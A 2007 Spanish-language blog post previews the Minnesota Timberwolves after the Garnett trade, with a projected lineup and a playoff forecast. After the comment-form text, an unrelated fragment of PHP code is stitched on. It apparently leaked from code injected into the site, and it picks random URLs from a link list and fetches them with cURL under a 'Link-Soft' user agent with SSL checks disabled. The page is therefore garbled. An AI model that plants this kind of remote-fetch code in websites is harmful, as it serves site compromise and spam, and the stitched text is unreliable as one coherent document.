Minnessota Timberwolves: jóvenes aunque preparados

01 de October de 2007 por txusma

Para un equipo no debe de ser nada fácil la venta de su jugador franquicia y menos aún si ese jugador ha sido MVP de la liga regular, MVP de un All-star, el primer jugador de la historia de la NBA en promediar como mínimo 20 puntos, 10 rebotes y 4 asistencias durante 9 temporadas seguidas y es el actual líder histórico de tu franquicia en puntos, rebotes, asistencias, robos, tapones y partidos jugados. Hay que pensárselo dos veces antes de tan siquiera ponerse a estudiar un traspaso.

Pero los Wolves se liaron la manta a la cabeza y Kevin Garnett abandonó el equipo a finales de julio con un palmarés impresionante a nivel individual pero muy pobre en el aspecto colectivo. Tan sólo en la temporada 2003-2004 y en compañía de Sam Cassell y Latrell Sprewell, el espigado ala-pívot alcanzó las Finales de Conferencia. El resto de temporadas acabaron en frustración.

Minnesota pasa página y lo hace a lo grande. Kevin Garnett ya no está y en su lugar ha llegado un grupo de jugadores jóvenes aunque sobradamente preparados. La estrella de este grupo es, sin ninguna duda, Al Jefferson. El primer jugador drafteado por los Celtics directamente desde el instituto no tuvo unos primeros años fáciles y su explosión de juego y números no ha sido un hecho hasta esta pasada temporada. Aprovechando las lesiones de Kendrick Perkins, Theo Ratliff y Michael Olowakandi, Jefferson jugó de titular en la posición de center contra los Memphis Grizzlies el 6 de diciembre de 2006 y cuajó una buena actuación. A partir de ese día sus números crecieron de manera exponencial: acabó la temporada con una media de 16 puntos y 11 rebotes y fue nombrado jugador de la semana de la Conferencia Este en una ocasión.

El otro jugador destacado del trade es Gerald ‘4 dedos’ Green. Comparado con T-Mac desde el instituto, ha ido abriéndose paso en los desastrosos Celtics hasta jugar 22 minutos por partido con unas medias interesantes. Todavía se espera mucho de este joven jugador y en Minnesota desean que sea en su equipo donde Green saque todo lo que lleva dentro.

Además de Jefferson y Green, llegan también a los Wolves Ryan Gomes y Sebastian Telfair. Todo el mundo sabe lo que aportará Gomes: intensidad y polivalencia. En cambio Telfair es toda una incógnita. El primo de Stephon Marbury encandilaba a todos con su juego en el instituto y los analistas le auguraban un puesto muy alto en el draft de 2004. Finalmente acabó siendo escogido en el puesto 14 por los Portland Trail Blazers, equipo en el que jugó dos años. Llegó a hacerse con el puesto de titular pero su rendimiento continuaba sin ser el esperado. Esto y sus problemas extradeportivos motivaron su traspaso a los Celtics. Allí tampoco ha cumplido las expectativas y sus problemas con la justicia han ido en aumento, hecho que provocó que el GM de Boston declarara que “Telfair no jugará más con los Boston Celtics”. Nadie en Minnessotta sabe qué esperar de él pero a priori recibirá la oportunidad de demostrar su calidad. Si la aprovecha no sería descabellado hablar del PG titular del equipo.

Estos cuatro jugadores se unen a una plantilla ya de por sí joven e interesante comandada por el que ha de ser uno de los referentes del futuro: Randy Foye. El año pasado llegó a un equipo donde ya había otros seis bases y aun así consiguió ganarse un puesto y acabar promediando más de 22 minutos por partido. Este jugador, que recuerda en ocasiones a Allen Iverson por su juego rápido y eléctrico, está ante la temporada que puede marcar su devenir en la NBA y convertirlo en estrella. Destacan también en el equipo Craig Smith, Rashad McCants y el rookie Corey Brewer, uno de los mejores defensores de perímetro de la NCAA y culpable, junto a Noah y Horford, de los últimos dos títulos de los Florida Gators.

Ricky Davis, Juwan Howard y Mark Blount completan una plantilla que tiene como principal objetivo crecer pero de la que se puede esperar que dé mucha guerra en el salvaje Oeste.

 

Quinteto: Randy Foye, Ricky Davis, Gerald Green, Al Jefferson y Mark Blount

Sexto Hombre: Corey Brewer

Pronóstico: Fuera de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>